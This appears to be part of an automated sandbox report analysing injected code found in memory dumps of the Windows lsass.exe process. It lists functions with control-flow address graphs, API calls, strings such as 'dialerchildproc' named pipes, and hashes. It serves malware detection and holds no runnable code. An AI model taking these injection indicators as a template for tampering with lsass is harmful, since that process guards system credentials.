                                                        • Instruction Fuzzy Hash: 6631A96470196BE3FB85EBAFEA596D62360F71EF54FE04423940A061A9DF38824DC352
                                                        Function 000002A2911C6910 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 230COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 317 2a2911c6910-2a2911c6916 318 2a2911c6951-2a2911c695b 317->318 319 2a2911c6918-2a2911c691b 317->319 322 2a2911c6a78-2a2911c6a8d 318->322 320 2a2911c691d-2a2911c6920 319->320 321 2a2911c6945-2a2911c6984 call 2a2911c6fc0 319->321 323 2a2911c6938 __scrt_dllmain_crt_thread_attach 320->323 324 2a2911c6922-2a2911c6925 320->324 337 2a2911c698a-2a2911c699f call 2a2911c6e54 321->337 338 2a2911c6a52 321->338 325 2a2911c6a8f 322->325 326 2a2911c6a9c-2a2911c6ab6 call 2a2911c6e54 322->326 332 2a2911c693d-2a2911c6944 323->332 328 2a2911c6931-2a2911c6936 call 2a2911c6f04 324->328 329 2a2911c6927-2a2911c6930 324->329 330 2a2911c6a91-2a2911c6a9b 325->330 340 2a2911c6aef-2a2911c6b20 call 2a2911c7190 326->340 341 2a2911c6ab8-2a2911c6aed call 2a2911c6f7c call 2a2911c6e1c call 2a2911c7318 call 2a2911c7130 call 2a2911c7154 call 2a2911c6fac 326->341 328->332 349 2a2911c6a6a-2a2911c6a77 call 2a2911c7190 337->349 350 2a2911c69a5-2a2911c69b6 call 2a2911c6ec4 337->350 342 2a2911c6a54-2a2911c6a69 338->342 351 2a2911c6b31-2a2911c6b37 340->351 352 2a2911c6b22-2a2911c6b28 340->352 341->330 349->322 369 2a2911c6a07-2a2911c6a11 call 2a2911c7130 350->369 370 2a2911c69b8-2a2911c69dc call 2a2911c72dc call 2a2911c6e0c call 2a2911c6e38 call 2a2911cac0c 350->370 357 2a2911c6b7e-2a2911c6b94 call 2a2911c268c 351->357 358 2a2911c6b39-2a2911c6b43 351->358 352->351 356 2a2911c6b2a-2a2911c6b2c 352->356 363 2a2911c6c1f-2a2911c6c2c 356->363 378 2a2911c6bcc-2a2911c6bce 357->378 379 2a2911c6b96-2a2911c6b98 357->379 364 2a2911c6b4f-2a2911c6b5d call 2a2911d5780 358->364 365 2a2911c6b45-2a2911c6b4d 358->365 372 2a2911c6b63-2a2911c6b78 call 2a2911c6910 364->372 382 2a2911c6c15-2a2911c6c1d 364->382 365->372 369->338 390 2a2911c6a13-2a2911c6a1f call 2a2911c7180 369->390 370->369 420 2a2911c69de-2a2911c69e5 __scrt_dllmain_after_initialize_c 370->420 372->357 372->382 380 2a2911c6bd0-2a2911c6bd3 378->380 381 2a2911c6bd5-2a2911c6bea call 2a2911c6910 378->381 379->378 387 2a2911c6b9a-2a2911c6bbc call 2a2911c268c call 2a2911c6a78 379->387 380->381 380->382 381->382 399 2a2911c6bec-2a2911c6bf6 381->399 382->363 387->378 414 2a2911c6bbe-2a2911c6bc6 call 2a2911d5780 387->414 407 2a2911c6a21-2a2911c6a2b call 2a2911c7098 390->407 408 2a2911c6a45-2a2911c6a50 390->408 404 2a2911c6c01-2a2911c6c11 call 2a2911d5780 399->404 405 2a2911c6bf8-2a2911c6bff 399->405 404->382 405->382 407->408 419 2a2911c6a2d-2a2911c6a3b 407->419 408->342 414->378 419->408 420->369 421 2a2911c69e7-2a2911c6a04 call 2a2911cabc8 420->421 421->369
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000025.00000002.2798699900.000002A2911C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A2911C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_37_2_2a2911c0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                        • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                        • API String ID: 190073905-1786718095
                                                        • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                        • Instruction ID: af5a5ce0cdbfeb3487fb4e6867138305428b7cfe6bc9de5e2f443df4e713f03d
                                                        • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                        • Instruction Fuzzy Hash: 1A81AF61700673EBF6D49B6F944939B22A0ABA7F80FB44025D90543796EF78C84DE703
                                                        Function 000002A29199CE28 Relevance: 18.1, APIs: 12, Instructions: 112COMMONLIBRARYCODE
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 424 2a29199ce28-2a29199ce4a GetLastError 425 2a29199ce4c-2a29199ce57 FlsGetValue 424->425 426 2a29199ce69-2a29199ce74 FlsSetValue 424->426 427 2a29199ce63 425->427 428 2a29199ce59-2a29199ce61 425->428 429 2a29199ce7b-2a29199ce80 426->429 430 2a29199ce76-2a29199ce79 426->430 427->426 431 2a29199ced5-2a29199cee0 SetLastError 428->431 432 2a29199ce85 call 2a29199d6cc 429->432 430->431 433 2a29199cef5-2a29199cf0b call 2a29199c748 431->433 434 2a29199cee2-2a29199cef4 431->434 435 2a29199ce8a-2a29199ce96 432->435 446 2a29199cf0d-2a29199cf18 FlsGetValue 433->446 447 2a29199cf28-2a29199cf33 FlsSetValue 433->447 437 2a29199cea8-2a29199ceb2 FlsSetValue 435->437 438 2a29199ce98-2a29199ce9f FlsSetValue 435->438 439 2a29199ceb4-2a29199cec4 FlsSetValue 437->439 440 2a29199cec6-2a29199ced0 call 2a29199cb94 call 2a29199d744 437->440 442 2a29199cea1-2a29199cea6 call 2a29199d744 438->442 439->442 440->431 442->430 450 2a29199cf1a-2a29199cf1e 446->450 451 2a29199cf22 446->451 453 2a29199cf35-2a29199cf3a 447->453 454 2a29199cf98-2a29199cf9f call 2a29199c748 447->454 450->454 455 2a29199cf20 450->455 451->447 456 2a29199cf3f call 2a29199d6cc 453->456 459 2a29199cf8f-2a29199cf97 455->459 460 2a29199cf44-2a29199cf50 456->460 461 2a29199cf62-2a29199cf6c FlsSetValue 460->461 462 2a29199cf52-2a29199cf59 FlsSetValue 460->462 463 2a29199cf80-2a29199cf88 call 2a29199cb94 461->463 464 2a29199cf6e-2a29199cf7e FlsSetValue 461->464 465 2a29199cf5b-2a29199cf60 call 2a29199d744 462->465 463->459 470 2a29199cf8a call 2a29199d744 463->470 464->465 465->454 470->459
                                                        APIs
                                                        • GetLastError.KERNEL32 ref: 000002A29199CE37
                                                        • FlsGetValue.KERNEL32(?,?,?,000002A2919A0A6B,?,?,?,000002A2919A045C,?,?,?,000002A29199C84F), ref: 000002A29199CE4C
                                                        • FlsSetValue.KERNEL32(?,?,?,000002A2919A0A6B,?,?,?,000002A2919A045C,?,?,?,000002A29199C84F), ref: 000002A29199CE6D
                                                        • FlsSetValue.KERNEL32(?,?,?,000002A2919A0A6B,?,?,?,000002A2919A045C,?,?,?,000002A29199C84F), ref: 000002A29199CE9A
                                                        • FlsSetValue.KERNEL32(?,?,?,000002A2919A0A6B,?,?,?,000002A2919A045C,?,?,?,000002A29199C84F), ref: 000002A29199CEAB
                                                        • FlsSetValue.KERNEL32(?,?,?,000002A2919A0A6B,?,?,?,000002A2919A045C,?,?,?,000002A29199C84F), ref: 000002A29199CEBC
                                                        • SetLastError.KERNEL32 ref: 000002A29199CED7
                                                        • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,000002A2919A0A6B,?,?,?,000002A2919A045C,?,?,?,000002A29199C84F), ref: 000002A29199CF0D
                                                        • FlsSetValue.KERNEL32(?,?,00000001,000002A29199ECCC,?,?,?,?,000002A29199BF9F,?,?,?,?,?,000002A291997AB0), ref: 000002A29199CF2C
                                                          • Part of subcall function 000002A29199D6CC: HeapAlloc.KERNEL32 ref: 000002A29199D721
                                                        • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000002A2919A0A6B,?,?,?,000002A2919A045C,?,?,?,000002A29199C84F), ref: 000002A29199CF54
                                                          • Part of subcall function 000002A29199D744: HeapFree.KERNEL32 ref: 000002A29199D75A
                                                          • Part of subcall function 000002A29199D744: GetLastError.KERNEL32 ref: 000002A29199D764
                                                        • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000002A2919A0A6B,?,?,?,000002A2919A045C,?,?,?,000002A29199C84F), ref: 000002A29199CF65
                                                        • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000002A2919A0A6B,?,?,?,000002A2919A045C,?,?,?,000002A29199C84F), ref: 000002A29199CF76
                                                        Memory Dump Source
                                                        • Source File: 00000025.00000002.2802003819.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_37_2_2a291990000_lsass.jbxd
                                                        Similarity
                                                        • API ID: Value$ErrorLast$Heap$AllocFree
                                                        • String ID:
                                                        • API String ID: 570795689-0
                                                        • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                        • Instruction ID: 1aa138d20fc0b827cb1c5f57aa31ac61a2da1025fa63ea259488452dcac820d6
                                                        • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                        • Instruction Fuzzy Hash: B6413D21341666C7FAE8677FDB5D36B61825B4FFB4F340624A936066DEDE28980D8202
                                                        Function 000002A291992244 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52filethreadCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000025.00000002.2802003819.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_37_2_2a291990000_lsass.jbxd
                                                        Similarity
                                                        • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                        • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                        • API String ID: 2171963597-1373409510
                                                        • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                        • Instruction ID: c11dfa66158928d1978f00f7439df635ea03f4532b3de643d8087e6cdc08bdfe
                                                        • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                        • Instruction Fuzzy Hash: 18213036714661C3FB508B2AF64835B77A0F78AFA4FA00215DA5902AE8CF7CC18DCB01
                                                        Function 000002A2911C9944 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 569 2a2911c9944-2a2911c99ac call 2a2911ca814 572 2a2911c99b2-2a2911c99b5 569->572 573 2a2911c9e13-2a2911c9e1b call 2a2911cbb48 569->573 572->573 575 2a2911c99bb-2a2911c99c1 572->575 577 2a2911c9a90-2a2911c9aa2 575->577 578 2a2911c99c7-2a2911c99cb 575->578 580 2a2911c9aa8-2a2911c9aac 577->580 581 2a2911c9d63-2a2911c9d67 577->581 578->577 579 2a2911c99d1-2a2911c99dc 578->579 579->577 583 2a2911c99e2-2a2911c99e7 579->583 580->581 582 2a2911c9ab2-2a2911c9abd 580->582 584 2a2911c9da0-2a2911c9daa call 2a2911c8a34 581->584 585 2a2911c9d69-2a2911c9d70 581->585 582->581 586 2a2911c9ac3-2a2911c9aca 582->586 583->577 587 2a2911c99ed-2a2911c99f7 call 2a2911c8a34 583->587 584->573 597 2a2911c9dac-2a2911c9dcb call 2a2911c6d40 584->597 585->573 588 2a2911c9d76-2a2911c9d9b call 2a2911c9e1c 585->588 590 2a2911c9ad0-2a2911c9b07 call 2a2911c8e10 586->590 591 2a2911c9c94-2a2911c9ca0 586->591 587->597 602 2a2911c99fd-2a2911c9a28 call 2a2911c8a34 * 2 call 2a2911c9124 587->602 588->584 590->591 606 2a2911c9b0d-2a2911c9b15 590->606 591->584 598 2a2911c9ca6-2a2911c9caa 591->598 599 2a2911c9cba-2a2911c9cc2 598->599 600 2a2911c9cac-2a2911c9cb8 call 2a2911c90e4 598->600 599->584 605 2a2911c9cc8-2a2911c9cd5 call 2a2911c8cb4 599->605 600->599 613 2a2911c9cdb-2a2911c9ce3 600->613 637 2a2911c9a2a-2a2911c9a2e 602->637 638 2a2911c9a48-2a2911c9a52 call 2a2911c8a34 602->638 605->584 605->613 611 2a2911c9b19-2a2911c9b4b 606->611 615 2a2911c9b51-2a2911c9b5c 611->615 616 2a2911c9c87-2a2911c9c8e 611->616 618 2a2911c9df6-2a2911c9e12 call 2a2911c8a34 * 2 call 2a2911cbaa8 613->618 619 2a2911c9ce9-2a2911c9ced 613->619 615->616 620 2a2911c9b62-2a2911c9b7b 615->620 616->591 616->611 618->573 622 2a2911c9cef-2a2911c9cfe call 2a2911c90e4 619->622 623 2a2911c9d00 619->623 624 2a2911c9b81-2a2911c9bc6 call 2a2911c90f8 * 2 620->624 625 2a2911c9c74-2a2911c9c79 620->625 633 2a2911c9d03-2a2911c9d0d call 2a2911ca8ac 622->633 623->633 652 2a2911c9bc8-2a2911c9bee call 2a2911c90f8 call 2a2911ca038 624->652 653 2a2911c9c04-2a2911c9c0a 624->653 630 2a2911c9c84 625->630 630->616 633->584 645 2a2911c9d13-2a2911c9d61 call 2a2911c8d44 call 2a2911c8f50 633->645 637->638 643 2a2911c9a30-2a2911c9a3b 637->643 638->577 651 2a2911c9a54-2a2911c9a74 call 2a2911c8a34 * 2 call 2a2911ca8ac 638->651 643->638 649 2a2911c9a3d-2a2911c9a42 643->649 645->584 649->573 649->638 675 2a2911c9a8b 651->675 676 2a2911c9a76-2a2911c9a80 call 2a2911ca99c 651->676 669 2a2911c9bf0-2a2911c9c02 652->669 670 2a2911c9c15-2a2911c9c72 call 2a2911c9870 652->670 657 2a2911c9c7b 653->657 658 2a2911c9c0c-2a2911c9c10 653->658 663 2a2911c9c80 657->663 658->624 663->630 669->652 669->653 670->663 675->577 679 2a2911c9df0-2a2911c9df5 call 2a2911cbaa8 676->679 680 2a2911c9a86-2a2911c9def call 2a2911c86ac call 2a2911ca3f4 call 2a2911c88a0 676->680 679->618 680->679
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000025.00000002.2798699900.000002A2911C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A2911C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_37_2_2a2911c0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                        • String ID: csm$csm$csm
                                                        • API String ID: 849930591-393685449
                                                        • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                        • Instruction ID: 1ab0267fc7bca66e60e4a560c75babf12bbadfccf9fd62817e12a732324c591d
                                                        • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                        • Instruction Fuzzy Hash: 36E18B727007A6DBEBA08B6AD48939E77A0F747F98F200106EA8957B55CF34C09DD702
                                                        Function 000002A29199A544 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000025.00000002.2802003819.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_37_2_2a291990000_lsass.jbxd
                                                        Similarity
                                                        • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                        • String ID: csm$csm$csm
                                                        • API String ID: 849930591-393685449
                                                        • Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                        • Instruction ID: 6c9b64aea459f5939bf3dd068a7343ba8d08770816b9b7ac5fa50ecb001ac872
                                                        • Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                        • Instruction Fuzzy Hash: 29E18D76700761CBFBA08B2AD64839E77A0F75AB98F200115EE8957B99CF34C489C742
                                                        Function 000002A29199F394 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000025.00000002.2802003819.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_37_2_2a291990000_lsass.jbxd
                                                        Similarity
                                                        • API ID: AddressFreeLibraryProc
                                                        • String ID: api-ms-$ext-ms-
                                                        • API String ID: 3013587201-537541572
                                                        • Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                        • Instruction ID: 695a17d8ccce6949de6e16a908dae3d83cd48f590e0b0682d832d3bf9de70fad
                                                        • Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                        • Instruction Fuzzy Hash: 1A41A422311A22D3FA95CB1FEA0C7576795B74FFE4F6941299D1A87788EE38C44D8302
                                                        Function 000002A29199104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000025.00000002.2802003819.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_37_2_2a291990000_lsass.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                        • String ID: d
                                                        • API String ID: 3743429067-2564639436
                                                        • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                        • Instruction ID: 1a33caf0f8baa57e1695812279deb1ee3f10c99bf09f8d6bf124dabded2f67c7
                                                        • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                        • Instruction Fuzzy Hash: CA416D72214B95D7E7A0CF26E54839B77A1F38AF98F548129DA8A07758DF38C48DCB01
                                                        Function 000002A29199D068 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 54COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • FlsGetValue.KERNEL32(?,?,?,000002A29199C7DE,?,?,?,?,?,?,?,?,000002A29199CF9D,?,?,00000001), ref: 000002A29199D087
                                                        • FlsSetValue.KERNEL32(?,?,?,000002A29199C7DE,?,?,?,?,?,?,?,?,000002A29199CF9D,?,?,00000001), ref: 000002A29199D0A6
                                                        • FlsSetValue.KERNEL32(?,?,?,000002A29199C7DE,?,?,?,?,?,?,?,?,000002A29199CF9D,?,?,00000001), ref: 000002A29199D0CE
                                                        • FlsSetValue.KERNEL32(?,?,?,000002A29199C7DE,?,?,?,?,?,?,?,?,000002A29199CF9D,?,?,00000001), ref: 000002A29199D0DF
                                                        • FlsSetValue.KERNEL32(?,?,?,000002A29199C7DE,?,?,?,?,?,?,?,?,000002A29199CF9D,?,?,00000001), ref: 000002A29199D0F0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000025.00000002.2802003819.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_37_2_2a291990000_lsass.jbxd
                                                        Similarity
                                                        • API ID: Value
                                                        • String ID: 1%$Y%
                                                        • API String ID: 3702945584-1395475152
                                                        • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                        • Instruction ID: 2eda56979e5e09bf1eaaea1a055d2580c86bac67b708ba4e2ae130481bc55e5c
                                                        • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                        • Instruction Fuzzy Hash: C5113061704666C7FAE8573FE79937B61816B4FFE4F384224942A066DEDE28844D8202
                                                        Function 000002A291997510 Relevance: 12.2, APIs: 8, Instructions: 230COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000025.00000002.2802003819.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_37_2_2a291990000_lsass.jbxd
                                                        Similarity
                                                        • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                        • String ID:
                                                        • API String ID: 190073905-0
                                                        • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                        • Instruction ID: f80ffc22932428fa4e3cbc88985e60adca33b6c3b2487c09d5e61210d3ffa293
                                                        • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                        • Instruction Fuzzy Hash: EA819E21700263C7FAD8AB6FE64939B6690A78FF80F7444259A054779EDF38C84D8B53
                                                        Function 000002A291999DC4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000025.00000002.2802003819.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_37_2_2a291990000_lsass.jbxd
                                                        Similarity
                                                        • API ID: Library$Load$AddressErrorFreeLastProc
                                                        • String ID: api-ms-
                                                        • API String ID: 2559590344-2084034818
                                                        • Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                        • Instruction ID: 5b077497e61e3eaf08f735d87a2babf30c03001d38dd30611cea9d9a8ed7bffa
                                                        • Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                        • Instruction Fuzzy Hash: 1E31E521312622D3FE91DB8FE60875622A4B74EFA0F6905259D2E07398EF39D09DC302
                                                        Function 000002A2919A3DB4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000025.00000002.2802003819.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_37_2_2a291990000_lsass.jbxd
                                                        Similarity
                                                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                        • String ID: CONOUT$
                                                        • API String ID: 3230265001-3130406586
                                                        • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                        • Instruction ID: 23f971f6aa6706c2256635c771a537c12f52c91efb7c1af5dc6ceecc5ee62274
                                                        • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                        • Instruction Fuzzy Hash: AB118E31310AA1C7F7908B1BF94831A66A0F38EFE4F644225EA2A877D4CF38C90C8741
                                                        Function 000002A291993790 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000025.00000002.2802003819.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_37_2_2a291990000_lsass.jbxd
                                                        Similarity
                                                        • API ID: CurrentProcessProtectVirtual$HandleModule
                                                        • String ID: wr
                                                        • API String ID: 1092925422-2678910430
                                                        • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                        • Instruction ID: 78aa278ec88c86537f2b5306803016608d9432e31d0b705b3b66faa2d80037fb
                                                        • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                        • Instruction Fuzzy Hash: 3B115A2A304762C3FB949B2BE50826A62B0F74AF84F650028DE9907798EF2DC64DC705
                                                        Function 000002A291995B30 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000025.00000002.2802003819.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_37_2_2a291990000_lsass.jbxd
                                                        Similarity
                                                        • API ID: Thread$Current$Context
                                                        • String ID:
                                                        • API String ID: 1666949209-0
                                                        • Opcode ID: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                        • Instruction ID: 8e6775f4180294222f22188b8baa7f2f2ca9f794fb603b8fb577a7d6741249f2
                                                        • Opcode Fuzzy Hash: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                        • Instruction Fuzzy Hash: FCD19C36205B99C2FAB09B1AE59435B77A0F38DF88F204116EA8D47B69DF3CC559CB01
                                                        Function 000002A291992F04 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000025.00000002.2802003819.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_37_2_2a291990000_lsass.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocFree
                                                        • String ID: dialer
                                                        • API String ID: 756756679-3528709123
                                                        • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                        • Instruction ID: d9b6e3f3fbde7c1d9873550896ce399894800054be0f13c2b67ef489ea9a009b
                                                        • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                        • Instruction Fuzzy Hash: 7B319D22701B66C3FA94DF2BE64876B67A0FB4AF84F1840209E4847B59EF34D4AD8301
                                                        Function 000002A29199CFA0 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000025.00000002.2802003819.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_37_2_2a291990000_lsass.jbxd
                                                        Similarity
                                                        • API ID: Value$ErrorLast
                                                        • String ID:
                                                        • API String ID: 2506987500-0
                                                        • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                        • Instruction ID: 4a7941c75334ec3185a8439fab1463888cffeda500893dbf40a9a79e8ddde821
                                                        • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                        • Instruction Fuzzy Hash: BD114F21341666C7FAE4573BE78D33B61925B5FFE4F3407249836476DEDE28840D8202
                                                        Function 000002A29199199C Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000025.00000002.2802003819.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_37_2_2a291990000_lsass.jbxd
                                                        Similarity
                                                        • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                        • String ID:
                                                        • API String ID: 517849248-0
                                                        • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                        • Instruction ID: 5a5af4342115806afc14c761473f91ccf1938b95f9de70327975ecfe1b508ef4
                                                        • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                        • Instruction Fuzzy Hash: B4013521300A62C2FA949B5BA94835A63A1F78DFC4FA84035DE5A43798DE3CC98EC701
                                                        Function 000002A2919936C8 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000025.00000002.2802003819.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_37_2_2a291990000_lsass.jbxd
                                                        Similarity
                                                        • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                        • String ID:
                                                        • API String ID: 449555515-0
